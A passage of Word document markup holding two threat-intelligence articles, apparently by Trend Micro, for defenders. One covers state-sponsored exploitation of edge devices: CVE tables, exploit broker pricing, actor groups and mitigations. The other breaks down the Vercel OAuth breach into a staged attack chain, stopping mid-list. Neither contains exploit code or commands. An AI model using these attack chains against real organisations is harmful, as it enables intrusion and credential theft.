        <w:t>Edge devices are blind spots by design. They cannot run endpoint detection and response (EDR) and offer limited logging. Additionally, patching them requires downtime that organizations are reluctant to schedule. As closed systems, they are also very hard to work with during forensic analysis and examination.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AI will accelerate this threat. Financially motivated actors are adopting these techniques, too, with new vendors being targeted and threat actors increasingly using AI tools to discover vulnerabilities at scale and to automate exploit development. The window between patch release and active exploitation is collapsing from weeks to hours.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This report is a threat landscape analysis for CISOs and security leaders rather than a vulnerability advisory. Based on publicly available data, we examine why edge devices have become the preferred entry point for espionage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>operations, who is exploiting them at scale, and what defenders can realistically do given the structural constraints. The appendix provides technical depth, including indicators of compromise (IoCs), exploit economics, and forensic artifacts from an active operator workstation.Why Edge Devices Are Under Attack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Edge device exploitation rose from 3% to 22% of all vulnerability exploitation breaches in a single year, an eightfold increase documented in the Verizon 2025 DBIR. Recorded Future's H1 2025 report showed that 53% of exploitation activity was state-sponsored, with edge appliances accounting for 17% of all actively exploited CVEs.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 do not view this as a temporary spike, but as a strategic recalculation by adversaries. As endpoint security has matured with EDR, multifactor authentication (MFA), and application allow-listing, attackers have shifted to assets on the network that have the highest value but the least defense. These assets are also the hardest to monitor efficiently.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Why edge devices? Edge devices sit at the boundary between an organization's internal network and the internet. They serve as VPN concentrators, firewalls, web application firewalls (WAFs), and access gateways. Compromising one provides attackers with the following: Networkwide visibility: This includes access to inbound/outbound traffic, internal topology, and user activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Credential harvesting: LDAP/Active Directory integration means domain credentials are accessible post-compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trust exploitation: Edge devices are listed in security policies and usually are trusted; traffic from them might be allowed as legitimate to other critical systems within the network. Attackers can use it for further pivoting and lateral movement within the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy infrastructure: Compromised devices can become relay points for command-and-control (C&amp;C) communications and pivots into partner networks or other systems, effectively becoming part of an Operational Relay Box (ORB) network.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At the same time, they are uniquely difficult to defend: No EDR support: Stripped-down or proprietary operating systems cannot run standard security agents. Vendor-provided monitoring is typically limited to system logging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Patching friction: Updates require downtime, testing, and maintenance windows that organizations are reluctant to schedule.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Limited forensic visibility: Many edge devices operate on in-memory file systems. A reboot can erase all evidence of compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Direct internet exposure: They are discoverable and reachable, forming the primary external attack surface.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combination of high strategic value and low defensive coverage makes edge devices the optimal target for espionage operations.Key Metrics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Metric Value Source Edge device exploitation (2024) ~22% of incidents (up from 3%) Verizon 2025 DBIR CVEs disclosed H1 2025 23,667 Recorded Future H1 2025 State-sponsored exploitation activity 53% Recorded Future H1 2025 Financially motivated exploitation 27% Recorded Future H1 2025 Exploited CVEs requiring no authentication 69% Recorded Future H1 2025 Exploited CVEs enabling RCE 30% Recorded Future H1 2025 Edge device remediation rate 54% Deepstrike 2025 Average patch time for edge devices ~30 days Deepstrike 2025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 General dynamics of vulnerability exploitation and mitigation, based on publicly available sourcesExploitation Trends: 2024 - 2026</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Between 2024 and 2026, state-sponsored actors exploited critical vulnerabilities across most major edge device vendors. The table below summarizes the key incidents.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Vendor/Device CVE Earliest Exploitation Impact China-Aligned Exploitation? Cisco IOS XE CVE-2018-0171, CVE-2023-20198, CVE-2023-20273 2024-2025 Device manager exploitation Yes Citrix NetScaler CVE-2025-5777, CVE-2025-6543 June-August 2025 Credential bypass plus RCE chain Yes Fortinet FortiGate CVE-2025-59718, CVE-2025-59719 December 2025-February 2026 SSO signature validation bypass Yes Fortinet FortiGate CVE-2026-24858 January 2026 FortiCloud SSO authentication bypass Multiple Ivanti Connect Secure CVE-2025-0282, CVE-2025-0283 December 2024 EAP handling flaws enabling RCE Yes Ivanti Connect Secure CVE-2025-22457 Mid-March 2025 X-Forwarded-For buffer overflow, unauthenticated RCE Yes Ivanti EPMM CVE-2025-4428 April 2025 XML parser bug chained with auth bypass Yes Ivanti EPMM CVE-2026-1281, CVE-2026-1340 Early 2026 Unsafe bash script execution, RCE Multiple Palo Alto PAN-OS 3400, CVE-2024-0012, CVE-2024-9474 2024-2025 Auth bypass, command injection Multiple SonicWall SMA1000 CVE-2025-40602 and CVE-2025-23006 January 2025 Stack- based buffer overflow Yes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2. Edge device vulnerabilities exploited in 2024 to date Note: The information in this table is solely based on publicly disclosed information and does not account for undisclosed vulnerabilities that have been exploited in the wild.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Several patterns emerge from the data. China-aligned groups appear to dominate, accounting for at least seven of 10 major campaigns. The exploitation window is shrinking: The time to exploit averaged two to four weeks post-patch, but GreyNoise's 2026 report noted that this window "has effectively collapsed" to days. Attackers are also reverse-engineering exploits from artifacts collected in the wild, weaponizing them independently of original disclosure. Ivanti has been hit particularly hard, suffering four separate campaigns within 18 months. See Appendix A for more details about Ivanti-targeting activities.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Moreover, the targeting spans all major vendors, with authentication bypass, memory corruption, and path traversal vulnerabilities exploited across the board. The impact can be seen globally. According to TeamT5, Ivanti exploitation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>alone affected victims across 12 countries: Austria, Australia, France, Spain, Japan, South Korea, the Netherlands, Singapore, Taiwan, the UAE, the UK, and the US. TrendAI telemetry corroborates these findings. Telecommunications, government, defense, and technology sectors were affected significantly.Economic Analysis: Why Edge Devices Are Targeted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Edge device exploitation will persist because the economics overwhelmingly favor attackers. It is not just technically convenient, but also the most cost-effective path to strategic intelligence collection. Pwn2Own data from TrendAI's Zero Day Initiative (ZDI) shows that offensive brokers pay 20 - 40 times more over coordinated disclosure prices for mobile exploits, but only two to five times more for edge device exploits. This confirms that edge vulnerabilities are structurally underpriced relative to their strategic value, making them especially attractive to cost-conscious state actors. For detailed analysis, refer to Vulnerability Broker Pricing in our appendix.Vulnerability Pricing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TrendAI's ZDI - the world's largest vendor-agnostic coordinated disclosure program - provides transparent pricing benchmarks through its annual Pwn2Own competitions. These figures reflect what researchers earn for reporting vulnerabilities responsibly to vendors. For comparison, nondefensive exploit acquisition markets operate in parallel, paying a structured premium to acquire the same vulnerabilities without vendor disclosure, keeping them secret and weaponizable for state-sponsored operations. Table 3 shows the pricing of exploits, based on public broker pricing and industry reporting. Our appendix contains a case study on pricing breakdown.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Coordinated disclosure market (ZDI Pwn2Own benchmark):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Target Type ZDI Pwn2Own Prize Range Strategic Value Mobile OS full chain (iPhone/Pixel, kernel) US$150,000 - US$250,000 Single device Browser full chain (Chrome, Safari, Firefox) US$85,000 - US$200,000 Single user endpoint Enterprise VM escape (VMware ESXi) US$150,000 - US$250,000 Hypervisor/datacenter SOHO Smashup (chained router + NAS) US$25,000 - US$100,000 Small network segment Individual edge/SOHO device RCE US$3,000 - US$25,000 Network entry point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3. ZDI's Pwn2Own historical pricing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Target Type Price Range Strategic Value Mobile OS (iOS, Android kernel) US$200,000 - US$7,000,000 Single device Browser RCE (Chrome, Firefox, Safari) US$100,000 - US$3500,000 Single user endpoint Windows kernel EoP US$90,000 - US$250,000 Privilege escalation Edge device RCE US$30,000 - US$100,000 Proxy/Network access Enterprise edge device RCE (Cisco, Fortinet, Invanti, etc) US$50,000 - US$100,000 Entire network access SOHO router exploits US$5,000 - US$30,000 Proxy/relay node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4. Offensive exploit acquisition market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Based on Tables 3 and 4, two patterns stand out: Offensive acquisition markets pay 20 to 40 times the coordinated disclosure rate for mobile exploits, but only 2 to 5 times for edge devices. The difference is that pricing is driven by a complexity of exploitation (mobile vs. embedded devices), the relative ease of vulnerability discovery, and market demand. Pricing for enterprise edge devices would be higher, but consumer/prosumer models already represent a major attack surface. This confirms that edge device vulnerabilities are structurally underpriced relative to their strategic value in the attacker's economy. While a mobile exploit costs millions and compromises one device, an edge device exploit at US$50,000 - US$100,000 yields access to an entire organization's network, credentials, and traffic. The price-to-access ratio for edge devices is unmatched across any other target category.China's Vulnerability Supply Chain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 the open market, these prices make edge exploits attractive. In China, state-directed vulnerability programs drive costs even lower. China's 2024 Network Data Regulations require 24- or 48-hour mandatory vulnerability reporting to state authorities, depending on the seriousness of the vulnerability. The Nvwa () Project and similar platforms, which operated in the past, offered payouts of RMB 50,000 - RMB 200,000 (USD 7,000 - USD 28,000) for edge device RCE. Note that this information uses solely historical data, as there is no up-to-date information on vulnerability supply chain pricing available in the open domain. Additionally, due to recent regulation changes in China, many of those programs are no longer publicly visible. However, we assess that these changes effectively nationalize vulnerability discovery, most likely giving state-aligned groups access to a steady supply of affordable and expendable exploits.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explains the pattern of rapid burning of Ivanti, Palo Alto, and Fortinet zero-days throughout 2024 and early 2026. These exploits are cheap enough to use widely and then discard, rather than carefully preserving them for high-value, single-use operations.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attacker's economics are favorable, but the defender's are not. Organizations face high costs when patching edge devices. VPN downtime affects remote workers, common security solutions are not present on edge devices, and even collecting forensic evidence from edge devices is not always straightforward. Testing is required to avoid breaking production, and maintenance windows must be coordinated across teams. This cost-benefit calculation routinely results in delayed patching, creating a remediation window of at least 30 days that attackers exploit through patch difference analysis and rapid weaponization.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attacker's economics are simple. A US$100,000 exploit targeting 33,000 Ivanti installations, with even 100 successful compromises, costs US$1,000 per victim. A phishing campaign targeting the same organizations probably costs more per success and yields far less immediate access.The Threat Actors: A Coordinated Ecosystem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Multiple China-aligned APT groups target edge devices systematically. The breadth and coordination suggest some level of coordination and are not entirely independent campaigns by different actor groups.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">UNC5221 is one of the most prolific edge device exploitation groups. They are responsible for repeated zero-day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>campaigns against Ivanti and Citrix NetScaler since late 2023. The group deploys the SPAWN malware ecosystem, purpose-built tools for persistence, tunneling, and log wiping on compromised appliances. Appendix C covers additional activity linked to UNC5221, including incidents others have attributed to the North Korean- aligned Kimsuky group that we assess are more likely tied to UNC5221. Earth Estries (Salt Typhoon) conducts the largest documented edge device campaign, breaching over 600 organizations across 80 countries since 2019. The group focuses heavily on telecommunications providers, including multiple U.S. carriers, in October 2024. The US Treasury sanctioned an affiliated Chinese company in January 2025.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon pursues a distinct mission of prepositioning for infrastructure disruption rather than traditional espionage. The group targets US critical infrastructure by compromising SOHO routers as proxy infrastructure, using living-off-the-land (LOTL) techniques exclusively. The US intelligence community assesses this as preparation for disruptive operations in a Taiwan contingency.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Together, these groups demonstrate what looks like a coordinated effort: UNC5221 provides rapid exploitation capability, Earth Estries conducts large-scale intelligence collection, and Volt Typhoon prepares for potential disruption. The shared targeting of edge devices reflects strategic prioritization that goes beyond individual group operations.Detection and Mitigation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combination of limited visibility, patching friction, and high strategic value makes edge devices uniquely challenging to defend.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should focus on four areas: strategic controls, closing the patching gap, detection, and incident response.Strategic Controls Start with visibility. Maintain a continuously updated inventory of all edge devices, firmware versions, and patch status. Without full visibility, exposure cannot be assessed. Attack surface management tools can automate discovery and risk-based prioritization. TrendAI Vision One - Cyber Risk Exposure Management provides attack surface discovery and risk-based prioritization, enabling teams to identify unmanaged edge devices and direct remediation where it matters most.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct network segmentation. Where possible, place edge devices in isolated DMZs with strict firewall rules. This limits lateral movement and prevents attackers from exploiting trust relationships if a device is compromised.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform external monitoring. Automate monitoring with systems like Censys, Shodan, or TrendAI Vision One - External Attack Surface Management to detect potentially suspicious, externally facing services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Set up proactive edge device monitoring. Establish event and network traffic monitoring for edge devices where possible. Investigate any suspicious activity.Closing the Patching Gap</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30-day average remediation window is the core vulnerability defenders must address. Two approaches help: Virtual patching: When immediate patching is not feasible, deploy virtual patching through IPS to shield vulnerable devices. TrendAI TippingPointTM provides network-based virtual patching that blocks exploitation attempts targeting known CVEs. This buys time while maintenance windows are scheduled. This is powered by the unmatched TrendAI Zero Day Initiative (ZDI), which was responsible for the disclosure of 73% of all zero-day vulnerabilities monitored by OMDIA in 2025.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Rapid patching process: Establish emergency procedures targeting 48-hour remediation for critical edge device CVEs.Detection Strategies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Edge devices require dedicated monitoring strategies: Certificate monitoring: Some attackers deploy backdoors using self-signed or attacker-controlled certificates. Monitor for unexpected certificates on edge devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File integrity monitoring: Check for unexpected, shared libraries, and recently modified files in system directories. For Ivanti devices, examine /lib, /usr/lib, /data directories for recently modified files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log analysis: Look for authentication successes without corresponding VPN connections, large off-hours data transfers, and internal RDP/SMB connections originating from edge device addresses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Memory forensics: Capture memory from edge device web server processes to detect in-memory implants that leave no disk artifacts.Mitigation strategies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If a compromise is suspected, conduct the following:Forensic collection: Collect and preserve all available artifacts from the suspected device before any remediation.Factory reset: Where supported, perform a full factory reset and rebuild from a known-good image.Credential rotation: Reset all AD credentials, service accounts, and local user passwords. Review system configuration for suspicious changes.Certificate review: Inspect all TLS certificates and flag any unrecognized entriesConclusion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Edge devices have become the primary initial access vector for sophisticated adversaries because the economics favor attackers, and defenders have not adapted. Organizations must stop treating these assets as networking equipment outside the security program. They require dedicated monitoring, accelerated patching, and architectural controls commensurate with their strategic value and their risk.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more technical details please see our Appendix.</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Posted in Cybercrime &amp; Digital Threats, Artificial Intelligence, Advanced Persistent Threats, Internet of Things, AI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.04.20 14:55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/edge-under-siege-how-state-sponsored-actors-exploit-your-perimeter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Vercel Breach: OAuth Supply Chain Attack Exposes the Hidden Risk in Platform Environment Variables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 OAuth supply chain compromise at Vercel exposed how trusted third party apps and platform environment variables can bypass traditional defenses and amplify blast radius. This article examines the attack chain, underlying design tradeoffs, and what it reveals about modern PaaS and software supply chain risk.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Peter Girnus Apr 20, 2026</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Key takeaways A compromised third-party OAuth application enabled long-lived, password- independent access to Vercel's internal systems, demonstrating how OAuth trust relationships can bypass traditional perimeter defenses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The impact was amplified by Vercel's environment variable model, where credentials not explicitly marked as sensitive were readable with internal access, exposing customer secrets at platform scale.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A publicly reported leaked-credential alert predating disclosure highlights detection-to-notification latency as a critical risk factor in platform breaches.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This incident fits a broader 2026 convergence pattern (LiteLLM, Axios) in which attackers consistently target developer-stored credentials across CI/CD, package registries, OAuth integrations, and deployment platforms. Effective defense requires architectural change: treating OAuth apps as third-party vendors, eliminating long-lived platform secrets, and designing for the assumption of provider-side compromise.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Developing situation - last updated Monday, April 20, 2026</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analysis reflects what is publicly known about the Vercel OAuth supply chain compromise at the time of publication. The incident remains under active investigation by Vercel and affected parties, and key details - including the full scope of downstream impact, the precise initial access vector, and attribution - may evolve as additional information becomes available. Where gaps exist, we have noted them explicitly rather than speculating. Defensive recommendations and detection guidance are based on the confirmed attack chain and established supply chain compromise patterns; organizations should act on these now rather than waiting for a complete picture. We will update this analysis as new technical details, vendor disclosures, or third-party research emerge.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an intrusion that began around June 2024 and was disclosed in April 2026, attackers leveraged a compromise of Context.ai's Google Workspace OAuth application to gain a foothold into Vercel's internal systems, exposing environment variables for an undisclosed but reportedly limited subset of customer projects. Vercel is a cloud deployment and hosting platform widely used for front-end and serverless applications.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 April 19, 2026, Vercel published its security bulletin and CEO Guillermo Rauch posted a detailed thread on X confirming the attack chain and naming Context.ai as the compromised third party.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incident is significant because it demonstrates how OAuth supply-chain trust relationships create lateral movement paths that bypass traditional perimeter defenses, and because Vercel's environment variable sensitivity model left non-sensitive credentials not encrypted at rest, making it readable to an attacker with internal access.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analysis examines the attack chain, evaluates the platform design decisions that amplified blast radius, contextualizes the breach against a rising wave of supply chain compromises (LiteLLM, Axios, Codecov, CircleCI), and provides actionable detection and hardening guidance for organizations operating on Vercel and similar PaaS platforms.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this incident reveals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makes this incident notable is not its sophistication, the techniques used are well-established, but for three broader implications that make it especially significant: OAuth amplification. A single OAuth trust relationship cascaded into a platform-wide exposure event affecting downstream customers who had no direct relationship with the compromised vendor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AI-accelerated tradecraft. The CEO publicly attributed the attacker's unusual velocity to AI augmentation - an early, high-profile data point in the 2026 discourse around AI-accelerated adversary tradecraft.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detection-to-disclosure latency. At least one public customer report suggests credentials were being flagged as leaked in the wild nine days before Vercel's disclosure - raising questions about detection-to- disclosure latency in platform breaches.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Incident timeline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attack spanned approximately 22 months from the initial OAuth compromise to Vercel's public disclosure. This dwell time is consistent with other OAuth-based intrusions, where attackers leverage legitimate application permissions that rarely trigger standard detection controls.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 Incident timeline illustrating approximately 22 months of dwell time.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Data Event Verification status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2024</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Context.ai's Google Workspace OAuth application compromised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CONFIRMED - Rauch statement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2024 - 2025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Attacker maintains persistent access via compromised OAuth token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CONFIRMED - Vercel bulletin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Late 2024 - Early 2025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Attacker pivots from Context.ai OAuth access to a Vercel employee's Google Workspace account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CONFIRMED - Rauch statement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Early - mid-2025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Internal Vercel systems accessed; customer environment variable enumeration begins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CONFIRMED - Vercel bulletin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~February 2025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ShinyHunters-affiliated actor allegedly begins selling Vercel data on BreachForums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UNVERIFIED - threat actor claims only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April 10, 2026</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notifies a Vercel customer of a leaked API key (per customer account on X)</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REPORTED - single source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April 19, 2026</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Vercel publishes security bulletin; Rauch posts detailed thread on X naming Context.ai</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CONFIRMED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April 19, 2026 onward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Customer notification, credential rotation guidance, and dashboard changes rolled out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CONFIRMED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 Summary of key events and their confirmation status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key observation from the timeline is that the dwell time from initial OAuth compromise and public disclosure spanned approximately 22 months. While extended dwell time is not unusual for sophisticated intrusions- Codecov breach went undetected for around 2 months and CircleCI for weeks- it shows the difficulty of detecting OAuth-based lateral movement that uses legitimate application permissions.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Compounding this issue, Google Workspace OAuth audit logs are retained six months by default on many subscription tiers, meaning forensic visibility into the earliest compromise activity was likely gone before investigators could even look.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Attack chain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attack exploited a trust chain that is endemic to modern SaaS environments: third-party OAuth applications granted access to corporate Google Workspace accounts.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2. Vercel breach attack chain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Stage 1: Third-Party OAuth compromise (T1199)</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Context.ai, a company providing AI analytics tooling, had a Google Workspace OAuth application authorized by Vercel employees. The attacker compromised this OAuth application - the exact mechanism of Context.ai's compromise has not been publicly disclosed. In his post on X, Rauch stated that Vercel has "reached out to Context to assist in understanding the full scale of the incident," phrasing that suggests Context may not have detected the compromise itself.</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is the critical initial access vector. OAuth applications, once authorized, maintain persistent access tokens that: Do not require the user's password Survive password rotations Often have broad scopes (email, drive, calendar access) Are rarely audited after initial authorization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Stage 2: Workspace account takeover (T1550.001)</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Using the compromised OAuth application's access, the attacker pivoted to a Vercel employee's Google Workspace account. This provided email access (potential for further credential harvesting), internal document access via Google Drive, calendar visibility into meetings and linked resources, and potential access to other OAuth-connected services.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Stage 3: Internal system access (T1078)</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From the compromised Workspace account, the attacker pivoted into Vercel's internal systems. Rauch described the escalation as "a series of maneuvers that escalated from our colleague's compromised Vercel Google Workspace account." The specific lateral movement technique - whether via SSO federation, harvested credentials from email/drive, or another OAuth- connected internal tool - has not been disclosed.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Stage 4: Environment variable enumeration (T1552.001)</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attacker accessed Vercel's internal systems with sufficient privileges to enumerate customer project environment variables. As per Rauch's public statement: Vercel stores all customer environment variables fully encrypted at rest, but the platform offers a capability to designate variables as "non-sensitive." Through enumeration of these non-sensitive variables, the attacker obtained further access.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Stage 5: Potential downstream exploitation (T1078.004)</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Exposed environment variables commonly contain credentials for downstream services. A single public customer report by Andrey Zagoruiko (April 19, 2026) described receiving an OpenAI leaked-key notification on April 10 for an API key that, according to the report, only existed only in Vercel- suggesting that at least one exposed credential was detected in the wild prior to Vercel's disclosure.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report introduces a potential detection-to-disclosure anomaly, which warrants closer examination and is explored in the following section.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Disclosure timeline anomaly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A public reply to Guillermo Rauch's April 19 thread on X surfaced a timeline detail that deserves independent attention. A Vercel customer, Andrey Zagoruiko, reported receiving a leaked-key notification from OpenAI on April 10, 2026-for an API key that, according to the customer, had never existed outside Vercel.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OpenAI's leaked-credential detection system typically triggers when an API key is found in a public location where it should not appear in (e.g., GitHub, paste sites, and similar sources). The pathway from a Vercel environment variable to an OpenAI notification is not trivially explained. Notably, the date creates a nine-day window between the earliest public evidence of exposure and Vercel's disclosure.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3. Disclosure timeline anomaly showing a nine-day gap between apparent credential exposure and public notification.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the 9-day gap means and what it does not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important to note that this is a single public report, not a forensic finding. It should not be interpreted as proof that Vercel knew about the compromise on April 10.</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however, evidence that at least one credential was detected in the wild before customers were formally notified to rotate secrets. This distinction matters for three audiences: Regulators: Under GDPR, the 72-hour breach notification clock starts when a controller becomes aware of a breach. The question of when Vercel became aware is now public.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Auditors: SOC 2 and ISO 27001 assessors will examine the detection-to- notification latency as part of continuous-monitoring evidence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
